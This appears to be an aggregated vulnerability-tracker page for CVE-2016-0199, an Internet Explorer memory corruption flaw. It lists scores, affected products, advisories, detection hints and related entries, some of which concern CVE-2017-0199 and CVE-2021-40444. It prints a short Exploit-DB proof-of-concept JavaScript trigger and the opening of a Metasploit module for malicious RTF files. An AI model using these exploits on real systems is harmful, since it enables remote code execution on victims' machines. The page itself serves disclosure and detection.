CVE-2016-0199
Published 2016-06-16
CVE-2016-0199: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web…
Priority P267 · high · 8.8 (CVSS 3.0)
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 51.00% (98.8th percentile)
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| msrc | internet_explorer_10_on_windows_server_2012 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_version_1511_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_8.1_for_x64-based_systems | — | — |
| msrc | internet_explorer_11_on_windows_rt_8.1 | — | — |
| msrc | internet_explorer_11_on_windows_server_2012_r2 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_server_2008_for_x64-based_systems_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_service_pack_2 | — | — |
| msrc | internet_explorer_9_on_windows_vista_x64_edition_service_pack_2 | — | — |
Detection & IOCs
command: oElement = document.createElement("IMG"); var oAttr = document.createAttribute("loop"); oAttr.nodeValue = oElement; oElement.loop = 0x41424344; oElement.setAttributeNode(oAttr); oElement.removeAttributeNode(oAttr); CollectGarbage();
- Look for JavaScript patterns invoking CollectGarbage() following setAttribute/removeAttributeNode manipulation on IMG elements, a hallmark of the IE11 garbage collector attribute type confusion exploit (MS16-063).
- The exploit targets Internet Explorer 11 specifically; monitor for IE11 process anomalies (e.g., iexplore.exe spawning child processes) following visits to untrusted or user-content-hosting websites.
- Exploitation likelihood is rated 'More Likely' for both latest and older software releases; prioritize detection on unpatched IE instances (KB3160005, KB3163017, KB3163018 absent).
- Internet Explorer on Windows Server 2008/2008 R2/2012/2012 R2 runs in Enhanced Security Configuration (restricted mode) by default, which reduces but does not eliminate exploitation risk.
- EMET can be configured to work with Internet Explorer to help mitigate exploitation of this memory corruption vulnerability.
CVSS provenance
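| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_msrc | | 8.8 | MEDIUM | |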
GHSA
GHSA-v2q7-558q-p2qh
ghsa_unreviewed · 2022-05-14 · CVSS 8.8
CVE-2016-0199 [HIGH] CWE-119
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.
GHSA
GHSA-m4vr-qxj3-p6xm
ghsa_unreviewed · 2022-05-14 · CVSS 8.8
CVE-2016-3211 [HIGH] CWE-119
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0199 and CVE-2016-0200.
GHSA
GHSA-w823-xr62-8g3q
ghsa_unreviewed · 2022-05-14 · CVSS 8.8
CVE-2016-0200 [HIGH] CWE-119
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0199 and CVE-2016-3211.
Microsoft
Internet Explorer Memory Corruption Vulnerability
vendor_msrc · 2016-06-14 · CVSS 8.8
CVE-2016-0199 [HIGH]
Description: A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
An attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to vie
No detection rules found.
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb · 2017-09-30
CVE-2017-0199
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it's possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Office Word - '.RTF' Malicious HTA Execution (Metasploit)
exploitdb · 2017-04-25
CVE-2017-0199
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec
Exploit-DB
Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)
exploitdb · 2016-06-21 · CVSS 8.8
CVE-2016-0199 [HIGH]
---
oElement = document.createElement("IMG");
var oAttr = document.createAttribute("loop");
oAttr.nodeValue = oElement;
oElement.loop = 0x41424344; // Set original value data to 44 43 42 41
oElement.setAttributeNode(oAttr); // Replace oElement with original value data
oElement.removeAttributeNode(oAttr);
CollectGarbage(); // Use original value data as address 0x41424344 of a vftable
Trendmicro
FormBook Adds Latest Office 365 0-Day Vulnerability CVE-2021-40444 to Its Arsenal
blogs_trendmicro · 2021-09-29 · CVSS 8.8
CVE-2021-40444 [HIGH]
Exploits & Vulnerabilities
Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.
By: Trend Micro
2021/09/29
Trend Micro detected a new campaign using a recent version of the known FormBook malware, an infostealer that has been around since 2016. Several analyses have been written about FormBook in the last few years, including the expanded support for macOS. FormBook is famous for highly obfuscated payloads and the use of document CVE exploitation. Until recently, FormBook mostly exploited CVE-2017-0199, but newer FormBook variants used
Zscaler
Zscaler found Multiple Security Vulnerabilities | 06-14-2016
blogs_zscaler
- http://packetstormsecurity.com/files/137533/Microsoft-Internet-Explorer-11-Garbage-Collector-Attribute-Type-Confusion.html
- http://seclists.org/fulldisclosure/2016/Jun/44
- http://www.securityfocus.com/archive/1/538706/100/0/threaded
- http://www.securitytracker.com/id/1036096
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-063
- https://www.exploit-db.com/exploits/39994/
- https://www.verisign.com/en_US/security-services/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1226